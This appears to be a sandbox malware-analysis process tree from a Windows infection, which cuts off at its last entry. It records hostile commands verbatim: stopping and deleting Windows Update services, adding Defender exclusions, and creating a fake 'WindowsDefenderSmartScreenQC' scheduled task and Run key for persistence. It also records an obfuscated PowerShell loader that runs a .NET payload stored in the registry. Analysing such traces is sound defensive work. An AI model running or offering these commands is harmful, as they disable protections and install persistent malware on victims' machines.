                                                                                                                                                                  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:2500
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:2140
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:2540
                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsDefenderSmartScreenQC /tr "'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe'"
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                          PID:2992
                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                        PID:1280
                                                                                                                                                                      • C:\Windows\System32\dialer.exe
                                                                                                                                                                        C:\Windows\System32\dialer.exe
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:2172
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:1636
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:3068
                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsDefenderSmartScreenQC /tr "'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe'"
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                PID:2488
                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                              C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:1400
                                                                                                                                                                                • C:\Windows\System32\sc.exe
                                                                                                                                                                                  sc stop UsoSvc
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                  PID:2916
                                                                                                                                                                                • C:\Windows\System32\sc.exe
                                                                                                                                                                                  sc stop WaaSMedicSvc
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                  PID:2568
                                                                                                                                                                                • C:\Windows\System32\sc.exe
                                                                                                                                                                                  sc stop wuauserv
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                  PID:2884
                                                                                                                                                                                • C:\Windows\System32\sc.exe
                                                                                                                                                                                  sc stop bits
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                  PID:1736
                                                                                                                                                                                • C:\Windows\System32\sc.exe
                                                                                                                                                                                  sc stop dosvc
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                  PID:1980
                                                                                                                                                                                • C:\Windows\System32\reg.exe
                                                                                                                                                                                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:2576
                                                                                                                                                                                  • C:\Windows\System32\reg.exe
                                                                                                                                                                                    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:2492
                                                                                                                                                                                    • C:\Windows\System32\reg.exe
                                                                                                                                                                                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:3004
                                                                                                                                                                                      • C:\Windows\System32\reg.exe
                                                                                                                                                                                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:1080
                                                                                                                                                                                        • C:\Windows\System32\reg.exe
                                                                                                                                                                                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:2644
                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:1660
                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:2408
                                                                                                                                                                                            • C:\Windows\System32\dialer.exe
                                                                                                                                                                                              C:\Windows\System32\dialer.exe
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:2776
                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:1676
                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:1708
                                                                                                                                                                                                    • C:\Windows\System32\sc.exe
                                                                                                                                                                                                      sc stop UsoSvc
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                      PID:2868
                                                                                                                                                                                                    • C:\Windows\System32\sc.exe
                                                                                                                                                                                                      sc stop WaaSMedicSvc
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                      PID:2160
                                                                                                                                                                                                    • C:\Windows\System32\sc.exe
                                                                                                                                                                                                      sc stop wuauserv
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                      PID:1736
                                                                                                                                                                                                    • C:\Windows\System32\sc.exe
                                                                                                                                                                                                      sc stop bits
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                      PID:732
                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:1972
                                                                                                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe "-611089911-937373074-57356543631304149-1897485999424457009-840935313214668521"
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                    PID:1420
                                                                                                                                                                                                  • C:\Windows\System32\sc.exe
                                                                                                                                                                                                    sc stop UsoSvc
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                                    PID:2720
                                                                                                                                                                                                  • C:\Windows\System32\sc.exe
                                                                                                                                                                                                    sc stop bits
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                                    PID:2792
                                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                    wmic path win32_VideoController get name
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:2844
                                                                                                                                                                                                    • C:\Windows\System32\sc.exe
                                                                                                                                                                                                      sc stop wuauserv
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                      PID:2852
                                                                                                                                                                                                    • C:\Windows\System32\sc.exe
                                                                                                                                                                                                      sc stop bits
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                      PID:2876
                                                                                                                                                                                                    • C:\Windows\System32\sc.exe
                                                                                                                                                                                                      sc stop dosvc
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                      PID:2900
                                                                                                                                                                                                    • C:\Windows\System32\reg.exe
                                                                                                                                                                                                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:2972
                                                                                                                                                                                                      • C:\Windows\System32\reg.exe
                                                                                                                                                                                                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:2988
                                                                                                                                                                                                        • C:\Windows\System32\reg.exe
                                                                                                                                                                                                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:3012
                                                                                                                                                                                                          • C:\Windows\System32\reg.exe
                                                                                                                                                                                                            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:3000
                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                              "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsDefenderSmartScreenQC /tr "'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe'"
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                              PID:2140
                                                                                                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe "1378080238415120727-1528355710-21231032111324067374-706360934-1600880421-144708571"
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:1336
                                                                                                                                                                                                              • C:\Windows\System32\reg.exe
                                                                                                                                                                                                                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:2964
                                                                                                                                                                                                                • C:\Windows\System32\reg.exe
                                                                                                                                                                                                                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:2956
                                                                                                                                                                                                                  • C:\Windows\System32\reg.exe
                                                                                                                                                                                                                    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:2948
                                                                                                                                                                                                                    • C:\Windows\System32\reg.exe
                                                                                                                                                                                                                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:2940
                                                                                                                                                                                                                      • C:\Windows\System32\reg.exe
                                                                                                                                                                                                                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:2932
                                                                                                                                                                                                                        • C:\Windows\System32\reg.exe
                                                                                                                                                                                                                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:2924
                                                                                                                                                                                                                          • C:\Windows\System32\sc.exe
                                                                                                                                                                                                                            sc stop WaaSMedicSvc
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                                                                            PID:2520
                                                                                                                                                                                                                          • C:\Windows\System32\sc.exe
                                                                                                                                                                                                                            sc stop wuauserv
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                                                                            PID:2480
                                                                                                                                                                                                                          • C:\Windows\System32\sc.exe
                                                                                                                                                                                                                            sc stop bits
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                                                                            PID:2588
                                                                                                                                                                                                                          • C:\Windows\System32\sc.exe
                                                                                                                                                                                                                            sc stop dosvc
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                                                                            PID:2684
                                                                                                                                                                                                                          • C:\Windows\System32\reg.exe
                                                                                                                                                                                                                            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:1360
                                                                                                                                                                                                                            • C:\Windows\System32\reg.exe
                                                                                                                                                                                                                              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:2472
                                                                                                                                                                                                                              • C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:2756
                                                                                                                                                                                                                                • C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:2804
                                                                                                                                                                                                                                  • C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:1848
                                                                                                                                                                                                                                    • C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                      sc stop UsoSvc
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                      PID:2412
                                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                      "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsDefenderSmartScreenQC /tr "'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe'"
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                      PID:2792
                                                                                                                                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe "652971582722428175-1629201998-18673838621209021675668800599624712062994912920"
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:2932
                                                                                                                                                                                                                                      • C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                        sc stop dosvc
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                                                                        PID:2884
                                                                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                        wmic cpu get name
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                        PID:1492
                                                                                                                                                                                                                                      • C:\Windows\system32\taskeng.exe
                                                                                                                                                                                                                                        taskeng.exe {A2F806A8-78E1-426D-B4FD-08C44C521BAD} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:2412
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+'F'+[Char](84)+''+[Char](87)+'A'+'R'+'E').GetValue(''+[Char](100)+''+[Char](105)+'a'+[Char](108)+''+'e'+'rs'+[Char](116)+''+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:2200
                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+'F'+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+''+'i'+''+'a'+''+[Char](108)+''+[Char](101)+''+'r'+'s'+[Char](116)+''+'a'+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:1768
                                                                                                                                                                                                                                            • C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                              sc stop WaaSMedicSvc
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                                                                              PID:2772
                                                                                                                                                                                                                                            • C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                              sc stop wuauserv
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                                                                              PID:2728
                                                                                                                                                                                                                                            • C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                              sc stop WaaSMedicSvc
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                                                                              PID:2660
                                                                                                                                                                                                                                            • C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                              sc stop UsoSvc
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                                                                              PID:2576
                                                                                                                                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe "1658311693-1991131985-669388633401786969840479781568726215-18836732791331144541"
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                              PID:332
                                                                                                                                                                                                                                            • C:\Windows\system32\taskeng.exe
                                                                                                                                                                                                                                              taskeng.exe {54E11F3C-A8AE-4F1C-B6D7-682A02366534} S-1-5-21-1563773381-2037468142-1146002597-1000:YBHADZIG\Admin:Interactive:[1]
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:2432
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:2368
                                                                                                                                                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe "12028595981985800704-797008653-139363868-2062155479700231324-563679395-51720928"
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:2520
                                                                                                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:2280
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
